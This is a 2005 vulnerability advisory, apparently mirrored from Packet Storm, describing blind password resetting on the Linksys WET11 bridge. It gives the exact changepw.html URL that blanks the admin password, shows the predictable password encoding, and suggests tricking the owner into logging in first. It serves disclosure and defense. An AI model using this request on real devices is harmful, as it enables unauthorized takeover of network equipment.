Lucene search
K

linksys-WET11_pass-reset.txt

🗓️ 17 Apr 2005 00:00:00Reported by Kristian HermansenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Cisco's Linksys WET11 ethernet bridge allows blind password resetting via URL with predictable password encoding, posing reconfiguration and security risks

Code
`==================   
=====Analysis=====   
==================   
Cisco's Linksys WET11 ethernet bridge product is vulnerable to password  
resetting based on GET fields in a URL directed at the device. The  
change password utility provided on the device uses GET to send an  
obfuscated password as the argument to the changepw.html page. The  
field that holds the password is named data. Here's what the URL looks  
like when the user tries to change the password to "admin":  
  
http://x.x.x.x/changepw.html?data=XVQsZV3.................  
  
The encoding of passwords is quite predictable, and I now show some  
examples of the passwords "a" through "h":  
  
http://x.x.x.x/changepw.html?data=XP......................   
http://x.x.x.x/changepw.html?data=Xf......................   
http://x.x.x.x/changepw.html?data=Xv......................   
http://x.x.x.x/changepw.html?data=Y.......................   
http://x.x.x.x/changepw.html?data=YP......................   
http://x.x.x.x/changepw.html?data=Yf......................   
http://x.x.x.x/changepw.html?data=Yv......................   
http://x.x.x.x/changepw.html?data=Z.......................  
  
This doesn't really matter, since if you are already on the network and  
can sniff packets, you can just base64 decode the basic auth strings  
flying by. However, I suggest you change the password blindly on this  
device using the following:  
  
http://x.x.x.x/changepw.html?data=........................  
  
This will create a blank password and allow you to login without knowing  
the old one. There is no verification when you change the password. In  
the newest version 1.5.4 of the firmware for the WET11 v1 device,  
however, someone must have logged in recently (timeout is _LONG_ though)  
to allow for this attack (ie. it will request the old password). In  
this scenario, just have them log in to check their settings, and a few  
minutes later, blank the password.  
  
==================   
===Implications===   
==================   
This attack allows anyone to reconfigure the IP address of the device  
and change any settings that the device allows. In the latest v1  
revision 1.5.4 of the firmware the old password must have been supplied  
recently to execute the attack.  
  
==================   
=====Affected=====   
==================   
Tested on Linksys WET11 v1 (1.5.4)   
Note: older versions may be affected++   
Note: WET11 v2 not tested, but may be vulnerable as well  
  
==================   
=====Solution=====   
==================   
Upgrade to the latest firmware to deter blind password resetting. Be  
aware that there is still no old password authentication when changing  
the password even in 1.5.4.   
http://www.linksys.com/download/firmware.asp  
--   
Kristian Hermansen <[email protected]>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation